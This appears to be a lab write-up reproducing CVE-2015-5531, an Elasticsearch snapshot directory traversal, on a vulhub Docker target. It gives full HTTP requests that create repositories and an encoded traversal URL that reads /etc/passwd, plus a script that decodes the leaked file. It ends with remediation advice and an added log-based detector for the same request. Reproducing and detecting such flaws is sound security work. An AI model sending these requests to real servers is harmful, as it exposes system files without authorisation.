Vulnerability Reproduction: CVE-2015-5531 ElasticSearch Directory Traversal
阿新 • Published: 2021-09-30
0x00 Lab Environment
Attacker machine: Win 10
Target: vulhub environment pulled with docker
0x01 Affected Versions
Below 1.6.1
0x02 Vulnerability Reproduction
(1) Visit the vulnerable page (9200 is usually the common ElasticSearch port)
(2) Create a repository
```http
PUT /_snapshot/test HTTP/1.1
Host: IP:9200
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 110

{ "type": "fs", "settings": { "location": "/usr/share/elasticsearch/repo/test" } }
```
(3) Create a snapshot
```http
PUT /_snapshot/test2 HTTP/1.1
Host: IP:9200
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 128

{ "type": "fs", "settings": { "location": "/usr/share/elasticsearch/repo/test/snapshot-backdata" } }
```
(4) Visit http://IP:9200/_snapshot/test/backdata%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd to read the server's account information. It comes back as ASCII codes and has to be decoded yourself; the decoding script is below:
```python
# Decode the comma-separated ASCII codes returned by the server back into text.
# `p` holds the values copied from the response (one long string, split here
# into adjacent literals only for readability).
p = ('114, 111, 111, 116, 58, 120, 58, 48, 58, 48, 58, 114, 111, 111, 116, 58, 47, 114, 111, 111, 116, 58, 47, 98, 105, 110, 47, 98, 97, 115, 104, 10, 100, 97, 101, 109, 111, 110, 58, 120, 58, 49, 58, 49, 58, 100, 97, 101, 109, 111, 110, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 98, 105, 110, 58, 120, 58, 50, 58, 50, 58, 98, 105, 110, 58, 47, 98, 105, 110, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 115, 121, 115, 58, 120, 58, 51, 58, 51, 58, 115, 121, 115, 58, 47, 100, 101, 118, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 115, 121, 110, 99, 58, 120, 58, 52, 58, 54, 53, 53, 51, 52, 58, 115, 121, 110, 99, 58, 47, 98, 105, 110, 58, 47, 98, 105, 110, 47, 115, 121, 110, 99, 10, 103, 97, 109, 101, 115, 58, 120, 58, 53, 58, 54, 48, 58, 103, 97, 109, 101, 115, 58, 47, 117, 115, 114, 47, 103, 97, 109, 101, 115, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 109, 97, 110, 58, 120, 58, 54, 58, 49, 50, 58, 109, 97, 110, 58, 47, 118, 97, 114, 47, 99, 97, 99, 104, 101, 47, 109, 97, 110, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 108, 112, 58, 120, 58, 55, 58, 55, 58, 108, 112, 58, 47, 118, 97, 114, 47, 115, 112, 111, 111, 108, 47, 108, 112, 100, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 109, 97, 105, 108, 58, 120, 58, 56, 58, 56, 58, 109, 97, 105, 108, 58, 47, 118, 97, 114, 47, 109, 97, 105, 108, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 110, 101, 119, 115, 58, 120, 58, 57, 58, 57, 58, 110, 101, 119, 115, 58, 47, 118, 97, 114, 47, 115, 112, 111, 111, 108, 47, 110, 101, 119, 115, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 117, 117, 99, 112, 58, 120, 58, 49, 48, 58, 49, 48, 58, '
     '117, 117, 99, 112, 58, 47, 118, 97, 114, 47, 115, 112, 111, 111, 108, 47, 117, 117, 99, 112, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 112, 114, 111, 120, 121, 58, 120, 58, 49, 51, 58, 49, 51, 58, 112, 114, 111, 120, 121, 58, 47, 98, 105, 110, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 119, 119, 119, 45, 100, 97, 116, 97, 58, 120, 58, 51, 51, 58, 51, 51, 58, 119, 119, 119, 45, 100, 97, 116, 97, 58, 47, 118, 97, 114, 47, 119, 119, 119, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 98, 97, 99, 107, 117, 112, 58, 120, 58, 51, 52, 58, 51, 52, 58, 98, 97, 99, 107, 117, 112, 58, 47, 118, 97, 114, 47, 98, 97, 99, 107, 117, 112, 115, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 108, 105, 115, 116, 58, 120, 58, 51, 56, 58, 51, 56, 58, 77, 97, 105, 108, 105, 110, 103, 32, 76, 105, 115, 116, 32, 77, 97, 110, 97, 103, 101, 114, 58, 47, 118, 97, 114, 47, 108, 105, 115, 116, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 105, 114, 99, 58, 120, 58, 51, 57, 58, 51, 57, 58, 105, 114, 99, 100, 58, 47, 118, 97, 114, 47, 114, 117, 110, 47, 105, 114, 99, 100, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 103, 110, 97, 116, 115, 58, 120, 58, 52, 49, 58, 52, 49, 58, 71, 110, 97, 116, 115, 32, 66, 117, 103, 45, 82, 101, 112, 111, 114, 116, 105, 110, 103, 32, 83, 121, 115, 116, 101, 109, 32, 40, 97, 100, 109, 105, 110, 41, 58, 47, 118, 97, 114, 47, 108, 105, 98, 47, 103, 110, 97, 116, 115, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, 105, 110, 10, 110, 111, 98, 111, 100, 121, 58, 120, 58, 54, 53, 53, 51, 52, 58, 54, 53, 53, 51, 52, 58, 110, 111, 98, 111, 100, 121, 58, 47, 110, 111, 110, 101, 120, 105, 115, 116, 101, 110, 116, 58, 47, 117, 115, 114, 47, 115, 98, 105, 110, 47, 110, 111, 108, 111, 103, '
     '105, 110, 10, 95, 97, 112, 116, 58, 120, 58, 49, 48, 48, 58, 54, 53, 53, 51, 52, 58, 58, 47, 110, 111, 110, 101, 120, 105, 115, 116, 101, 110, 116, 58, 47, 98, 105, 110, 47, 102, 97, 108, 115, 101, 10')

# Split on the commas, convert each integer ASCII code to its character,
# and collect the characters in a list (empty fragments are skipped).
chars = [chr(int(code)) for code in p.split(',') if code.strip()]
print(chars)

# Join the list back into a single string.
decoded = ''.join(chars)
print(decoded)
```
As for the POC, go find it yourself; I think sending the packet and decoding is much better.
Running String.fromCharCode(98) in the browser console can also do the conversion:
0x03 Vulnerability Principle
I searched for a long time and couldn't find the vulnerability principle, so here is a rough description:
In 1.5.1 and earlier, the vulnerability can be triggered without any configuration. In later versions, the configuration file elasticsearch.yml must contain path.repo, whose value is a directory that must be writable; this effectively restricts the root location of backup repositories. If the value is not configured, the feature is not enabled by default.
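To make the path.repo restriction concrete, the following is an added example (not code from the original post, and not Elasticsearch's own implementation): it models a repository root check that URL-decodes a requested snapshot path and verifies it still resolves inside path.repo, then applies that check to constructed reverse-proxy access-log lines so the traversal request from step (4) is flagged. The path.repo value and the log format are assumptions.

```python
import posixpath
import re
from urllib.parse import unquote

# Assumed path.repo setting (the repository root used in this post's requests).
PATH_REPO = "/usr/share/elasticsearch/repo"


def resolve_under_repo(repo_root, requested):
    """Return the normalized absolute path if `requested` stays inside
    repo_root, otherwise None. The request is URL-decoded first so that an
    encoded %2f..%2f is treated as ../ rather than as a harmless file name."""
    root = posixpath.normpath(repo_root)
    joined = posixpath.normpath(posixpath.join(root, unquote(requested)))
    if joined == root or joined.startswith(root + "/"):
        return joined
    return None


# Matches the request line of a _snapshot call in an access log and captures
# everything after /_snapshot/ up to the next space or quote.
_SNAPSHOT_RE = re.compile(r'"(?:GET|PUT|POST) /_snapshot/([^ "]+)')


def flag_traversal_requests(log_lines, repo_root=PATH_REPO):
    """Return the snapshot request paths whose decoded form escapes repo_root.
    Only the path is examined; what to do with a hit is up to the caller."""
    flagged = []
    for line in log_lines:
        m = _SNAPSHOT_RE.search(line)
        if m and resolve_under_repo(repo_root, m.group(1)) is None:
            flagged.append(m.group(1))
    return flagged


# Constructed sample log lines (not captured from a real system).
SAMPLE_LOG = [
    '10.0.0.5 - - [30/Sep/2021:10:00:01 +0800] "PUT /_snapshot/test HTTP/1.1" 200 21',
    '10.0.0.5 - - [30/Sep/2021:10:00:02 +0800] "PUT /_snapshot/test2 HTTP/1.1" 200 21',
    '10.0.0.5 - - [30/Sep/2021:10:00:03 +0800] "GET /_snapshot/test/backdata%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1" 200 1203',
    '10.0.0.5 - - [30/Sep/2021:10:00:04 +0800] "GET /_snapshot/test/snapshot-backdata HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for path in flag_traversal_requests(SAMPLE_LOG):
        print("snapshot path resolves outside path.repo:", path)
```

A single URL-decode is enough for this post's request; a production check would also reject paths that still contain `%` after decoding, since double-encoded separators would otherwise slip past a one-pass normalization.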
0x04 Remediation Suggestions
1. Upgrade the version
2. Set the permissions of the repo directory to read-only, not writable (my own suggestion, and only where it does not affect business operations)
0x05 References
https://www.cnblogs.com/qianxiao996/p/13574645.html
0x06 Disclaimer
This vulnerability reproduction article is intended only for study, work and personal interest, and is written with the aim of contributing to network security; any security incidents caused by unscrupulous hackers who make use of the content of this blog have nothing to do with me!